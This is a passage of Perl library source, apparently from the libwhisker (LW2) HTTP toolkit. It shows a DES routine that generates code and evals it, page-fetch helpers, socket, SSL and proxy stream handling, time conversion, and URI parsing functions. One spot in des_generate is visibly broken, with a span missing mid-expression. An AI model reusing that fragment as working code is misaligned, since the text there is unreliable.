\@keyb ); foreach $i ( 0 .. 7 ) { $out[$i] = 0; } foreach $i ( 0 .. 63 ) { $out[ int( $i / 8 ) ] |= ( 1 << ( 7 - ( $i % 8 ) ) ) if ( $outb[$i] ); } my $out = pack( "C8", @out ); return $out; } sub des_generate { # really scary dragons here....this code is optimized # for speed, and not readability my ( $i, $j ); my $code = <[$i] - 1 ) . "];\n"; } for ( $i = 0 ; $i < 32 ; $i++ ) { $code .= "\$l->[$i]=\$p[$i]; \$r->[$i]=\$p[" . ( $i + 32 ) . "];\n"; } $code .= 'for($i=0;$i<16;$i++){ local (@er,@erk,@b,@cb,@pcb,@r2);'; for ( $i = 0 ; $i < 48 ; $i++ ) { $code .= "\$erk[$i]=\$r->[" . ( $perm4->[$i] - 1 ) . "]^(\$ki->[\$i]->[$i]);\n"; } for ( $i = 0 ; $i < 8 ; $i++ ) { for ( $j = 0 ; $j < 6 ; $j++ ) { $code .= "\$b[$i][$j]=\$erk[" . ( $i * 6 + $j ) . "];\n"; } } for ( $i = 0 ; $i < 8 ; $i++ ) { $code .= "\$m=(\$b[$i][0]<<1)|\$b[$i][5];\n"; $code .= "\$n=(\$b[$i][1]<<3)|(\$b[$i][2]<<2)|(\$b[$i][3]<<1)|\$b[$i][4];\n"; for ( $j = 0 ; $j < 4 ; $j++ ) { $code .= "\$b[$i][$j]=(\$sbox->[$i][\$m][\$n]&" . ( 1 << ( 3 - $j ) ) . ")?1:0;\n"; } } for ( $i = 0 ; $i < 8 ; $i++ ) { for ( $j = 0 ; $j < 4 ; $j++ ) { $code .= "\$cb[" . ( $i * 4 + $j ) . "]=\$b[$i][$j];\n"; } } for ( $i = 0 ; $i < 32 ; $i++ ) { $code .= "\$pcb[$i]=\$cb[" . ( $perm5->[$i] - 1 ) . "];\n"; } for ( $i = 0 ; $i < 32 ; $i++ ) { $code .= "\$r2[$i]=(\$l->[$i])^\$pcb[$i];\n"; } for ( $i = 0 ; $i < 32 ; $i++ ) { $code .= "\$l->[$i]=\$r->[$i]; \$r->[$i]=\$r2[$i];\n"; } $code .= '}}}'; eval "$code"; #print "DEBUG: $code\n\n"; $generated++; } } ##### end of DES container ################################################ ######################################################################## =item B Params: $url [, \%request] Return: $code, $data ($code will be set to undef on error, $data will contain error message) This function will fetch the page at the given URL, and return the HTTP response code and page contents. Use this in the form of: ($code,$html)=LW2::get_page("http://host.com/page.html") The optional %request will be used if supplied. This allows you to set headers and other parameters. =cut sub get_page { my ( $URL, $hr ) = ( shift, shift ); return ( undef, 'No URL supplied' ) if ( length($URL) == 0 ); my ( %req, %resp ); my $rptr; if ( defined $hr && ref($hr) ) { $rptr = $hr; } else { $rptr = \%req; http_init_request( \%req ); } my @u = uri_split( $URL, $rptr ); return ( undef, 'Non-HTTP URL supplied' ) if ( $u[1] ne 'http' && $u[1] ne 'https' ); http_fixup_request($rptr); if ( http_do_request( $rptr, \%resp ) ) { return ( undef, $resp{'whisker'}->{'error'} ); } return ( $resp{'whisker'}->{'code'}, $resp{'whisker'}->{'data'} ); } ######################################################################## =item B Params: $url [, \%request] Return: $hash_ref (undef on no URL) This function will fetch the page at the given URL, and return the whisker HTTP response hash. The return code of the function is set to $hash_ref->{whisker}->{get_page_hash}, and uses the http_do_request() return values. Note: undef is returned if no URL is supplied =cut sub get_page_hash { my ( $URL, $hr ) = ( shift, shift ); return undef if ( length($URL) == 0 ); my ( %req, %resp ); my $rptr; if ( defined $hr && ref($hr) ) { $rptr = $hr; } else { $rptr = \%req; http_init_request( \%req ); } my @u = uri_split( $URL, $rptr ); # this is newer >=1.1 syntax return undef if ( $u[1] ne 'http' && $u[1] ne 'https' ); http_fixup_request($rptr); my $r = http_do_request( $rptr, \%resp ); $resp{whisker}->{get_page_hash} = $r; return \%resp; } ######################################################################## =item B Params: $url, $filepath [, \%request] Return: $code ($code will be set to undef on error) This function will fetch the page at the given URL, place the resulting HTML in the file specified, and return the HTTP response code. The optional %request hash sets the default parameters to be used in the request. NOTE: libwhisker does not do any file checking; libwhisker will open the supplied filepath for writing, overwriting any previously-existing files. Libwhisker does not differentiate between a bad request, and a bad file open. If you're having troubles making this function work, make sure that your $filepath is legal and valid, and that you have appropriate write permissions to create/overwrite that file. =cut sub get_page_to_file { my ( $URL, $filepath, $hr ) = @_; return undef if ( length($URL) == 0 ); return undef if ( length($filepath) == 0 ); my ( %req, %resp ); my $rptr; if ( defined $hr && ref($hr) ) { $rptr = $hr; } else { $rptr = \%req; http_init_request( \%req ); } my @u = uri_split( $URL, $rptr ); # this is newer >=1.1 syntax return undef if ( $u[1] ne 'http' && $u[1] ne 'https' ); http_fixup_request($rptr); return undef if ( http_do_request( $rptr, \%resp ) ); open( OUT, ">$filepath" ) || return undef; binmode(OUT); # stupid Windows print OUT $resp{'whisker'}->{'data'}; close(OUT); return $resp{'whisker'}->{'code'}; } @_stream_FUNCS = ( [ 'open', 'close', 'read', 'write', 'writedone', 'valid' ], # stream_NULL [ 'socket', 'all', 'socket', 'socket', 'noop', 'socket' ] , # stream_SOCKTCP 1 [ 'socket', 'all', 'socket', 'socket', 'noop', 'never' ] , # stream_SOCKUDP 2 [ 'file', 'all', 'socket', 'file', 'noop', 'never' ], # stream_FILE 3 [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'netssleay' ], # stream_NETSSLEAY 4 [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'never' ], # stream_NETSSL 5 [ 'buffer', 'buffer', 'buffer', 'buffer', 'noop', 'never' ] # stream_BUFFER 6 ); sub stream_key { my ( $key, $type, $wh ) = ( '', 1, shift ); if ( defined $wh->{whisker}->{UDP} && $wh->{whisker}->{UDP} > 0 ) { $type = 2; $key = 'udp:'; } if ( $wh->{whisker}->{ssl} > 0 ) { $type = 4 if ( $LW_SSL_LIB == 1 ); $type = 5 if ( $LW_SSL_LIB == 2 ); $key = 'ssl:'; } if ( defined $wh->{whisker}->{file_stream} ) { $type = 3; $key = 'file=' . $wh->{whisker}->{file_stream} . ':'; } if ( defined $wh->{whisker}->{buffer_stream} ) { $type = 6; $key = 'buffer:'; } my ( $x, $h, $p ) = (0); if ( defined $wh->{whisker}->{proxy_host} ) { $h = $wh->{whisker}->{proxy_host}; $p = $wh->{whisker}->{proxy_port} || 80; $x++; $key .= 'proxy:'; if ( $type == 5 ) { $x = 0; $ENV{HTTPS_PROXY} = "$h:$p"; $h = $wh->{whisker}->{host}; $p = $wh->{whisker}->{port}; } } else { $h = $wh->{whisker}->{host}; $p = $wh->{whisker}->{port}; } $key .= $h . ':' . $p; if ( defined $wh->{whisker}->{stream_num} ) { $key .= '/' . $wh->{whisker}->{stream_num}; } return $key if ( !wantarray() ); return ( $type, $h, $p, $x, $key ); } sub stream_setsock { my $fd = shift; my $wh = http_new_request( host => 'localhost', port => 80, ssl => 0 ); my $xr = stream_new($wh); return undef if ( $xr->{streamtype} != 1 ); $xr->{sock} = $fd; $xr->{state} = 1; $xr->{eof} = 0; $xr->{clearall}->(); return $xr; } { $SYMCOUNT = 0; sub stream_new { my ( $c, $rh ) = ( 0, shift ); my $sock = _stream_newsock(); my %x; %x = ( bufin => '', bufout => '', error => '', streamtype => 0, eof => 0, ctx => undef, sock => $sock, state => 0, syns => 0, reqs => 0, timeout => $rh->{whisker}->{timeout} || 10, nonblock => 0, forceclose => 0 ); ( $x{streamtype}, $x{chost}, $x{cport}, $x{proxy}, $x{key} ) = stream_key($rh); return undef if ( $x{streamtype} == 0 ); return undef if ( $LW_SSL_LIB == 0 && ( $x{streamtype} == 4 || $x{streamtype} == 5 ) ); return undef if ( $x{streamtype} != 3 && $x{streamtype} != 6 && !defined $Socket::VERSION ); $x{nonblock} = $LW_NONBLOCK_CONNECT if ( $x{streamtype} == 1 ); $x{forceclose} = 1 if ( $x{streamtype} == 5 ); $x{slurp} = $rh->{whisker}->{trailing_slurp} || 0; my @N = @{ $_stream_FUNCS[ $x{streamtype} ] }; for ( $c = 0 ; $c < 6 ; $c++ ) { my $n = $_stream_FUNCS[0]->[$c]; my $e = '$x{"' . $n . '"}=sub{&_stream_' . $N[$c] . "_$n" . '(\%x,@_)}'; eval "$e"; } $x{queue} = sub { $x{bufout} .= shift }; $x{clearall} = sub { $x{bufin} = $x{bufout} = '' }; $x{clear} = sub { $x{bufout} = '' }; return bless \%x, 'LW2::stream'; } sub _stream_newsock { # same as Symbol::gensym my $pkg = "LW2::"; my $name = "_STREAM_" . $SYMCOUNT++; delete $$pkg{$name}; return \*{ $pkg . $name }; } } sub _stream_all_close { my $xr = shift; $xr->{state} = 0; if ( $xr->{streamtype} == 4 ) { eval { $xr->{sock}->shutdown() }; eval { close( $xr->{origsock} ) }; # eval { Net::SSLeay::free($xr->{sock}) }; } else { eval { close( $xr->{sock} ) }; } } sub _stream_never_valid { return 0; } sub __bad_netssleay_error { my $err = Net::SSLeay::ERR_get_error; return 0 if ( $err == Net::SSLeay::ERROR_NONE || $err == Net::SSLeay::ERROR_WANT_READ || $err == Net::SSLeay::ERROR_WANT_WRITE ); return 1; } sub _stream_netssleay_valid { my $xr = shift; return 0 if ( $LW_SSL_KEEPALIVE == 0 || $xr->{state} == 0 ); return 0 if ( &Net::SSLeay::OPENSSL_VERSION_NUMBER < 0x0090601f ); my $lo = Net::SSLeay::pending( $xr->{sock} ); if ( $lo > 0 ) { # leftover data to slurp if ( !$xr->{slurp} ) { return 0 if ( !_stream_ssl_read($xr) ); } else { # todo #$xr->{slurped}.=$x."\0"; } } return 0 if ( __bad_netssleay_error() ); my ( $r, $e, $vin ) = ( undef, undef, '' ); my $fno = fileno( $xr->{origsock} ); vec( $vin, $fno, 1 ) = 1; if ( select( ( $r = $vin ), undef, ( $e = $vin ), .0001 ) ) { return 0 if ( vec( $e, $fno, 1 ) ); if ( vec( $r, $fno, 1 ) ) { # waiting data, let's peek my $temp = Net::SSLeay::peek( $xr->{sock}, 1 ); return 0 if ( __bad_netssleay_error() ); return 0 if ( $temp <= 0 ); } } return 1; } sub _stream_socket_valid { my $xr = shift; return 0 if ( $xr->{state} == 0 ); my ( $o, $vin ) = ( undef, '' ); vec( $vin, fileno( $xr->{sock} ), 1 ) = 1; if ( select( ( $o = $vin ), undef, undef, .0001 ) ) { my ( $hold, $res ); do { $res = sysread( $xr->{sock}, $hold, 4096 ); return _stream_err( $xr, 1, 'is_valid sysread failed' ) if ( !defined $res ); # error return 0 if ( $res == 0 ); # EOF if ( !$xr->{slurp} ) { $xr->{bufin} .= $hold; } else { $xr->{slurped} .= $hold . "\0"; } } while ( $res && select( ( $o = $vin ), undef, undef, .0001 ) ); } return 1; } sub _stream_socket_read { my $xr = shift; return 0 if ( $xr->{state} == 0 ); my ( $vin, $t ) = ( '', '' ); vec( $vin, fileno( $xr->{sock} ), 1 ) = 1; return 0 if ( !select( $vin, undef, undef, $xr->{timeout} ) ); my $res = sysread( $xr->{sock}, $t, 4096 ); return _stream_err( $xr, 1, 'sysread failed' ) if ( !defined $res ); if ( $res == 0 ) { $xr->{eof} = 1; return 0; } $xr->{bufin} .= $t; $xr->{eof} = 0; return 1; } sub _stream_ssl_read { my ( $xr, $t ) = ( shift, '' ); return 0 if ( $xr->{state} == 0 ); if ( $xr->{streamtype} == 4 ) { local $SIG{ALRM} = sub { die "lw_timeout\n" }; local $SIG{PIPE} = sub { die "lw_pipe\n" }; eval { eval { alarm( $xr->{timeout} ) }; # sleep(1) while(!Net::SSLeay::pending($xr->{sock})); $t = Net::SSLeay::read( $xr->{sock} ); eval { alarm(0) }; }; return 0 if ( $@ || __bad_netssleay_error() || !defined $t || $t eq '' ); } elsif ( $xr->{streamtype} == 5 ) { return 0 if ( !$xr->{sock}->read( $t, 4096 ) ); } $xr->{bufin} .= $t; return 1; } sub _stream_noop_writedone { } sub _stream_ssl_writedone { my $xr = shift; if ( $xr->{streamtype} == 4 ) { # Net::SSLeay shutdown $xr->{origsock}, 1; } else { # Net::SSL #shutdown $xr->{sock}, 1; } } sub _stream_socket_write { my ( $xr, $data, $v, $wrote ) = ( shift, shift, '', 0 ); return 0 if ( $xr->{state} == 0 ); $xr->{bufout} .= $data if ( defined $data ); my $len = length( $xr->{bufout} ); return 1 if ( $len == 0 ); vec( $v, fileno( $xr->{sock} ), 1 ) = 1; return _stream_err( $xr, 1, 'stream write test failed' ) if ( !select( undef, $v, undef, .0001 ) ); my $piperr = 0; local $SIG{PIPE} = sub { $piperr++ }; # $wrote=syswrite($xr->{sock},$xr->{bufout},$len); # return _stream_err($xr,1,'syswrite failed') # if(!defined $wrote || $piperr); # $xr->{error} = 'could not send entire queue' && return 0 # if($wrote!=$len); # $xr->{bufout}=''; # return 1; do { $wrote = syswrite( $xr->{sock}, $xr->{bufout}, $len ); if ( defined $wrote ) { substr( $xr->{bufout}, 0, $wrote ) = ''; } else { if ( $! != EWOULDBLOCK ) { $piperr++; } else { vec( $v, fileno( $xr->{sock} ), 1 ) = 1; $piperr++ if ( !select( undef, $v, undef, $xr->{timeout} ) ); } } return _stream_err( $xr, 1, 'syswrite failed' ) if ($piperr); $len = length( $xr->{bufout} ); } while ( $len > 0 ); return 1; } sub _stream_ssl_write { my ( $xr, $data, $wrote, $err ) = ( shift, shift, 0, '' ); return 0 if ( $xr->{state} == 0 ); $xr->{bufout} .= $data if ( defined $data ); my $len = length( $xr->{bufout} ); return 1 if ( $len == 0 ); if ( $xr->{streamtype} == 4 ) { ( $wrote, $err ) = Net::SSLeay::ssl_write_all( $xr->{sock}, \$xr->{bufout} ); if ( __bad_netssleay_error() || !$wrote ) { $xr->{error} = "SSL error: $err"; return 0; } if ( $wrote != $len ) { $xr->{error} = 'could not send entire queue'; return 0; } } elsif ( $xr->{streamtype} == 5 ) { $xr->{sock}->print( $xr->{bufout} ); # bummer, no error checking? } $xr->{bufout} = ''; return 1; } sub _stream_socket_alloc { my ( $xr, $wh ) = @_; if ( $xr->{streamtype} == 2 ) { return _stream_err( $xr, 0, 'socket problems (UDP)' ) if ( !socket( $xr->{sock}, PF_INET, SOCK_DGRAM, getprotobyname('udp') || 0 ) ); } else { return _stream_err( $xr, 0, 'socket() problems' ) if ( !socket( $xr->{sock}, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0 ) ); } if ( defined $wh->{whisker}->{bind_socket} ) { my $p = $wh->{whisker}->{bind_port} || '*'; $p =~ tr/0-9*//cd; return _stream_err( $xr, 0, 'Bad bind_port value' ) if ( $p eq '' ); my $a = INADDR_ANY; $a = inet_aton( $wh->{whisker}->{bind_addr} ) if ( defined $wh->{whisker}->{bind_addr} ); return _stream_err( $xr, 0, 'Bad bind_addr value' ) if ( !defined $a ); if ( $p =~ tr/*// ) { for ( $p = 14011 ; $p < 65535 ; $p++ ) { if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) ) { return _stream_err( $xr, 0, 'bind() on socket failed' ) if ( $! ne 'Address already in use' ); } else { last; } } return _stream_err( $xr, 0, 'bind() cannot find open socket' ) if ( $p >= 65535 ); } else { return _stream_err( $xr, 0, 'bind() on socket failed' ) if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) ); } } if ( !defined $xr->{iaton} ) { $xr->{iaton} = inet_aton( $xr->{chost} ); return _stream_err( $xr, 0, 'can\'t resolve hostname' ) if ( !defined $xr->{iaton} ); } $xr->{socket_alloc}++; return 1; } sub _stream_socket_nonblock { my ( $fl, $xr, $nonblock ) = ( 0, @_ ); if ( $^O =~ /Win32/ ) { $fl = 1 if ($nonblock); # 0x8004667e = FIONBIO in Winsock2.h if ( !ioctl( $xr->{sock}, 0x8004667e, \$fl ) ) { return 0; } } else { if ( !( $fl = fcntl( $xr->{sock}, F_GETFL, 0 ) ) ) { return 0; } $fl |= O_NONBLOCK if ($nonblock); $fl &= ~O_NONBLOCK if ( !$nonblock ); if ( !( fcntl( $xr->{sock}, F_SETFL, $fl ) ) ) { return 0; } } return 1; } sub _stream_socket_open { my ( $vin, $xr, $wh ) = ( '', @_ ); return 0 if ( !defined $wh ); $xr->{'close'}->() if ( $xr->{state} > 0 ); return 0 if ( !_stream_socket_alloc( $xr, $wh ) ); $xr->{timeout} = $wh->{whisker}->{timeout} || 10; if ( $xr->{nonblock} ) { if ( !_stream_socket_nonblock( $xr, 1 ) ) { $xr->{nonblock} = 0; $LW_NONBLOCK_CONNECT = 0; } else { my $R = connect( $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} ) ); if ( !$R ) { return _stream_err( $xr, 1, 'can\'t connect (connect error)' ) if ( $! != EINPROGRESS && $! != EWOULDBLOCK ); vec( $vin, fileno( $xr->{sock} ), 1 ) = 1; return _stream_err( $xr, 1, 'can\'t connect (timeout)' ) if ( !select( undef, $vin, $vin, $xr->{timeout} ) || !getpeername( $xr->{sock} ) ); } # leave in nonblock for normal TCP # if($xr->{streamtype} != 1 && !_stream_socket_nonblock($xr,0)){ # $LW_NONBLOCK_CONNECT=0; # return _stream_err($xr,1,'setting sock to block'); # } } } if ( !$xr->{nonblock} ) { eval { local $SIG{ALRM} = sub { die "timeout\n" }; eval { alarm( $xr->{timeout} ) }; if ( !connect( $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} ) ) ) { eval { alarm(0) }; die "connect failed\n"; } eval { alarm(0) }; }; return _stream_err( $xr, 0, 'can\'t connect (' . substr( $@, 0, index( $@, "\n" ) ) . ')' ) if ($@); } binmode( $xr->{sock} ); my $S = select( $xr->{sock} ); $|++; select($S); $xr->{state} = 1; $xr->{syns}++; return 1; } sub _stream_ssl_open { my ( $xr, $wh ) = @_; return 0 if ( !defined $wh ); $xr->{close}->() if ( $xr->{state} > 0 ); my $W = $wh->{whisker}; if ( $xr->{streamtype} == 5 ) { # these have to always be set, to overwrite any previous # set values (using ENV is a crappy way to do this) $ENV{HTTPS_KEY_FILE} = $W->{ssl_rsacertfile} || ''; $ENV{HTTPS_CERT_FILE} = $W->{ssl_certfile} || ''; eval { $xr->{sock} = Net::SSL->new( PeerAddr => $xr->{chost}, PeerPort => $xr->{cport}, Timeout => $xr->{timeout} ); }; return _stream_err( $xr, 0, 'can\'t connect: ' . $@ ) if ($@ || !defined $xr->{sock}); $xr->{sock}->autoflush(1); $xr->{state} = 1; # Net::SSL doesn't use stream_socket_open, so fake syns $xr->{syns}++; return 1; } return 0 if ( $xr->{streamtype} != 4 ); # otherwise, we're stream_NETSSLEAY if ( !defined $xr->{ctx} ) { return _stream_err( $xr, 0, 'ssl ctx create' ) if ( !( $xr->{ctx} = Net::SSLeay::CTX_new() ) ); Net::SSLeay::CTX_set_options( $xr->{ctx}, &Net::SSLeay::OP_ALL ); if ( defined $W->{ssl_rsacertfile} ) { if ( !( Net::SSLeay::CTX_use_RSAPrivateKey_file( $xr->{ctx}, $W->{ssl_rsacertfile}, &Net::SSLeay::FILETYPE_PEM ) ) ) { return _stream_err( $xr, 0, 'ssl ctx rsacert' ); } } if ( defined $W->{ssl_certfile} ) { if ( !( Net::SSLeay::CTX_use_certificate_file( $xr->{ctx}, $W->{ssl_certfile}, &Net::SSLeay::FILETYPE_PEM ) ) ) { return _stream_err( $xr, 0, 'ssl ctx cert' ); } } } # just to be safe, catch any errors that didn't get returned return _stream_err($xr, 0, 'ssl setup error' ) if( __bad_netssleay_error() ); return _stream_err( $xr, 0, 'ssl create new' ) if ( !( $xr->{sslobj} = Net::SSLeay::new( $xr->{ctx} ) ) ); if ( defined $W->{ssl_ciphers} ) { if ( !( Net::SSLeay::set_cipher_list( $xr->{sslobj}, $W->{ssl_ciphers} ) ) ) { return _stream_err( $xr, 0, 'ssl set ciphers' ); } } # now we use a normal socket to connect return 0 if ( !_stream_socket_open( $xr, $wh ) ); $xr->{state} = 1; if ( $xr->{proxy} ) { my $C = 'CONNECT ' . $W->{host} . ':' . $W->{port} . " HTTP/1.0\r\n"; $C .= 'Proxy-Authorization: ' . $wh->{'Proxy-Authorization'} . "\r\n" if ( defined $wh->{'Proxy-Authorization'} ); $C .= "\r\n"; my $r = syswrite( $xr->{sock}, $C, length($C) ); return _stream_err( $xr, 1, 'sending proxy connect string' ) if ( !defined $r || $r != length($C) ); # now we need to read proxy response and parse it do { return _stream_err( $xr, 1, 'ssl proxy request failed' ) if ( !_stream_socket_read($xr) ); } while ( index( $xr->{bufin}, "\n\n" ) == -1 && index( $xr->{bufin}, "\r\n\r\n" ) == -1 ); return _stream_err( $xr, 1, 'proxy couldn\'t make connection' ) if ( $xr->{bufin} !~ /^HTTP\/1.[0-9]+\W+200/ ); #$xr->{bufin}=''; $xr->{clearall}->(); } Net::SSLeay::set_fd( $xr->{sslobj}, fileno( $xr->{sock} ) ); Net::SSLeay::set_session( $xr->{sslobj}, $xr->{sslsession} ) if ( defined $xr->{sslsession} ); return _stream_err( $xr, 1, 'ssl connect failed' ) if ( !( Net::SSLeay::connect( $xr->{sslobj} ) ) || __bad_netssleay_error() ); # my $x = Net::SSLeay::ctrl( $xr->{sslobj}, 6, 0, '' ); $xr->{sslsession} = Net::SSLeay::get_session( $xr->{sslobj} ) if ( defined $W->{ssl_resume} && $W->{ssl_resume} > 0 ); # little trickery to abstract/normalize stuff $xr->{origsock} = $xr->{sock}; $xr->{sock} = $xr->{sslobj}; return 1; } sub _stream_file_open { my ( $xr, $wh ) = @_; $xr->{close}->() if ( $xr->{state} > 0 ); my $file = $wh->{whisker}->{file_stream}; return _stream_err( $xr, 0, 'invalid file' ) if ( !-e $file || !-f $file ); return _stream_err( $xr, 0, 'file open failure' ) if ( !sysopen( $xr->{sock}, $file, 'r' ) ); binmode($xr->{sock}); # Stupid Windows $xr->{state} = 1; } sub _stream_file_write { my $xr = shift; $xr->{bufout} = ''; return 1; } sub _stream_buffer_open { my ( $xr, $wh ) = @_; $xr->{close}->() if ( $xr->{state} > 0 ); $xr->{state} = 1; } sub _stream_buffer_close { my $xr = shift; $xr->{state} = 0; $xr->{bufout} = $xr->{bufin} = ''; } sub _stream_buffer_read { my $xr = shift; return 0 if ( $xr->{state} == 0 ); if ( length( $xr->{bufout} ) > 0 ) { $xr->{bufin} .= $xr->{bufout}; $xr->{bufout} = ''; } if ( length( $xr->{bufin} ) == 0 ) { $xr->{eof} = 1; return 0; } $xr->{eof} = 0; return 1; } sub _stream_buffer_write { my ( $xr, $data ) = ( shift, shift ); return 0 if ( $xr->{state} == 0 ); $xr->{bufout} .= $data if ( defined $data ); my $len = length( $xr->{bufout} ); return 1 if ( $len == 0 ); $xr->{bufin} .= $xr->{bufout}; $xr->{bufout} = ''; return 1; } sub _stream_err { my ( $xr, $close, $error ) = @_; $xr->{error} = $error; $xr->{error} .= ": $!" if ( defined $! && $! ne '' ); $xr->{'close'}->() if ($close); $xr->{state} = 0; return 0; } ######################################################################## =item B Params: $seconds, $minutes, $hours, $day_of_month, $month, $year_minus_1900 Return: $seconds [ -1 on error ] Performs a general mktime calculation with the given time components. Note that the input parameter values are expected to be in the format output by localtime/gmtime. Namely, $seconds is 0-60 (yes, there can be a leap second value of 60 occasionally), $minutes is 0-59, $hours is 0-23, $days is 1-31, $month is 0-11, and $year is 70-127. This function is limited in that it will not process dates prior to 1970 or after 2037 (that way 32-bit time_t overflow calculations aren't required). Additional parameters passed to the function are ignored, so it is safe to use the full localtime/gmtime output, such as: $seconds = LW2::time_mktime( localtime( time ) ); Note: this function does not adjust for time zone, daylight savings time, etc. You must do that yourself. =cut sub time_mktime { my ($sec,$min,$hour,$day,$mon,$yr)=@_; my @md=(0,31,59,90,120,151,181,212,243,273,304,334); foreach(@_[0..5]){ return -1 if !defined $_ || $_<0; } return -1 if($sec>60 || $min>59 || $hour>23 || $day>31 || $mon>11 || $yr>137 || $yr<70); $yr += 1900; my $res = ($yr-1970)*365+$md[$mon]; $res += int(($yr-1969)/4) + int(($yr-1601)/400); $res -= int(($yr-1901)/100); $res = ($res+$day-1)*24; $res = ($res+$hour)*60; $res = ($res+$min)*60; return $res+$sec; } =item B Params: $seconds_gmt Return: $seconds_local_timezone Takes a seconds value in UTC/GMT time and adjusts it to reflect the current timezone. This function is slightly expensive; it takes the gmtime() and localtime() representations of the current time, calculates the delta difference by turning them back into seconds via time_mktime, and then applies this delta difference to $seconds_gmt. Note that if you give this function a time and subtract the return value from the original time, you will get the delta value. At that point, you can just apply the delta directly and skip calling this function, which is a massive performance boost. However, this will cause problems if you have a long running program which crosses daylight savings time boundaries, as the DST adjustment will not be accounted for unless you recalculate the new delta. =cut sub time_gmtolocal { my $t = shift; my $now = time; my $utc = time_mktime(gmtime($now)); my $me = time_mktime(localtime($now)); return $t - ($utc - $me); } ################################################################# =item B Params: $uri_string [, \%request_hash] Return: @uri_parts Return an array of the following values, in order: uri, protocol, host, port, params, frag, user, password. Values not defined are given an undef value. If a %request hash is passed in, then uri_split() will also set the appropriate values in the hash. Note: uri_split() will only set the %request hash if the protocol is HTTP or HTTPS! =cut sub uri_split { my ( $uri, $work ) = ( shift, '', 0 ); my ($hr) = shift; # (uri,protocol,host,port,params,frag,user,pass) my @res = ( undef, undef, undef, 0, undef, undef, undef, undef ); return undef if ( !defined $uri ); # remove fragments ( $uri, $res[5] ) = split( '#', $uri, 2 ) if ( index( $uri, '#', 0 ) >= 0 ); # get scheme and net_loc my $net_loc = undef; if ( $uri =~ s/^([-+.a-z0-9A-Z]+):// ) { $res[1] = lc($1); if ( substr( $uri, 0, 2 ) eq '//' ) { my $w = index( $uri, '/', 2 ); if ( $w >= 0 ) { $net_loc = substr( $uri, 2, $w - 2 ); $uri = substr( $uri, $w, length($uri) - $w ); } else { ( $net_loc = $uri ) =~ tr#/##d; $uri = '/'; } } } # parse net_loc info if ( defined $net_loc ) { if ( index( $net_loc, '@', 0 ) >= 0 ) { ( $res[6], $net_loc ) = split( /\@/, $net_loc, 2 ); if ( index( $res[6], ':', 0 ) >= 0 ) { ( $res[6], $res[7] ) = split( ':', $res[6], 2 ); } } $res[3] = $1 if ( $net_loc =~ s/:([0-9]+)$// ); $res[2] = $net_loc; } # remove query info ( $uri, $res[4] ) = split( '\?', $uri, 2 ) if ( index( $uri, '?', 0 ) >= 0 ); # whatever is left over is the uri $res[0] = $uri; if ( $res[3] == 0 && defined $res[1] ) { $res[3] = 80 if ( $res[1] eq 'http' ); $res[3] = 443 if ( $res[1] eq 'https' ); } my $rel_uri = 0; $rel_uri++ if ( $res[3] == 0 && !defined $res[2] && !defined $res[1] && $res[0] ne '' ); return @res if ( $res[3] == 0 && !$rel_uri ); if ( defined $hr && ref($hr) ) { $$hr{whisker}->{uri} = $res[0] if ( defined $res[0] ); if ( defined $res[4] ) { $$hr{whisker}->{parameters} = $res[4]; } else { delete $$hr{whisker}->{parameters}; } return @res if ($rel_uri); if ( $res[1] eq 'https' ) { $$hr{whisker}->{ssl} = 1; } else { $$hr{whisker}->{ssl} = 0; } $$hr{whisker}->{host} = $res[2] if ( defined $res[2] ); $$hr{whisker}->{port} = $res[3]; if ( defined $res[6] ) { $$hr{whisker}->{uri_user} = $res[6]; } else { delete $$hr{whisker}->{uri_user}; } if ( defined $res[7] ) { $$hr{whisker}->{uri_password} = $res[7]; } else { delete $$hr{whisker}->{uri_password}; } } return @res; } ################################################################# =item B Params: @vals Return: $url Takes the @vals array output from http_split_uri, and returns a single scalar/string with them joined again, in the form of: protocol://user:pass@host:port/uri?params#frag =cut sub uri_join { my @V = @_; my $URL; $URL .= $V[1] . ':' if defined $V[1]; if ( defined $V[2] ) { $URL .= '//'; if ( defined $V[6] ) { $URL .= $V[6]; $URL .= ':' . $V[7] if defined $V[7]; $URL .= '@'; } $URL .= $V[2]; } if ( $V[3] > 0 ) { my $no = 0; $no++ if ( $V[3] == 80 && defined $V[1] && $V[1] eq 'http' ); $no++ if ( $V[3] == 443 && defined $V[1] && $V[1] eq 'https' ); $URL .= ':' . $V[3] if ( !$no ); } $URL .= $V[0]; $URL .= '?' . $V[4] if defined $V[4]; $URL .= '#' . $V[5] if defined $V[5]; return $URL; } ################################################################# =item B Params: $uri, $base_uri [, $normalize_flag ] Return: $absolute_uri Double checks that the given $uri is in absolute form (that is, "http://host/file"), and if not (it's in the form "/file"), then it will append the given $base_uri to make it absolute. This provides a compatibility similar to that found in the URI subpackage. If $normalize_flag is set to 1, then the output will be passed through uri_normalize before being returned. =cut sub uri_absolute { my ( $uri, $buri, $norm ) = @_; return undef if ( !defined $uri || !defined $buri ); return $uri if ( $uri =~ m#^[-+.a-z0-9A-Z]+://# ); if ( substr( $uri, 0, 1 ) eq '/' ) { if ( $buri =~ m#^[-+.a-z0-9A-Z]+://# ) { my @p = uri_split($buri); $buri = "$p[1]://$p[2]"; $buri .= ":$p[3]" if ( ($p[1] eq 'http' && $p[3] != 80) || ($p[1] eq 'https' && $p[3] != 443) ); # $buri.='/'; } else { # ah suck, base URI isn't absolute... return $uri; } } else { $buri =~ s/[?#].*$//; # remove params and fragments $buri .= '/' if ( $buri =~ m#^[a-z]+://[^/]+$#i ); $buri =~ s#/[^/]*$#/#; } return uri_normalize("$buri$uri") if ( defined $norm && $norm > 0 ); return $buri . $uri; } ################################################################# =item B Params: $uri [, $fix_windows_slashes ] Return: $normalized_uri [ undef on error ] Takes the given $uri and does any /./ and /../ dereferencing in order to come up with the correct absolute URL. If the $fix_ windows_slashes parameter is set to 1, all \ (back slashes) will be converted to / (forward slashes). Non-http/https URIs return an error. =cut sub uri_normalize { my ( $host, $uri, $win ) = ( '', @_ ); $uri =~ tr#\\#/# if ( defined $win && $win > 0 ); if ( $uri =~ s#^([-+.a-z0-9A-Z]+:)## ) { return undef if ( $1 ne 'http:' && $1 ne 'https:' ); $host = $1; return undef unless ( $uri =~ s#^(//[^/]+)## ); $host .= $1; } return "$host/" if ( $uri eq '' || $uri eq '/' ); # fast path check return "$host$uri" if ( index( $uri, '/.' ) < 0 ); my 